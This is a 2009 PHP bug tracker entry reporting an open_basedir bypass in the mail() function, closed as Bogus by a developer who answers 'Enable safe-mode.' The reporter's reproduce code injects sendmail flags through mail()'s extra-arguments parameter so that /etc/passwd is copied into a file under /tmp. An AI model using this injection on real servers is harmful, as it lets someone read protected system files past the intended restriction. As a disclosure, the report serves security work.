#48229 [Opn->Bgs]: mail() function open_basedir bypass

jani Mon, 11 May 2009 02:32:43 -0700

 ID:               48229
 Updated by:       j...@php.net
 Reported By:      root at 80sec dot com
-Status:           Open
+Status:           Bogus
 Bug Type:         Safe Mode/open_basedir
 Operating System: linux
 PHP Version:      5.2.9
 New Comment:


Enable safe-mode.


Previous Comments:
------------------------------------------------------------------------

[2009-05-11 02:35:50] root at 80sec dot com

Description:
------------
The mail function may bypass open_basedir or read/write arbitrary
 file.

Reproduce code:
---------------
<?php
$to = 'jian...@80sec.com'.str_repeat("x",10000);
$subject = 'the subject'.str_repeat("x",10);
$message = 'hello'.str_repeat("x",10);
mail($to, $subject, $message, $headers,"-v -bt -X /tmp/80sec -d13 -C
/etc/passwd");
?>

Expected result:
----------------
we can get the contents of /etc/passwd in /tmp/80sec.

Actual result:
--------------
we can get the contents of /etc/passwd in /tmp/80sec.


------------------------------------------------------------------------


-- 
Edit this bug report at http://bugs.php.net/?id=48229&edit=1

#48229 [Opn->Bgs]: mail() function open_basedir bypass

Reply via email to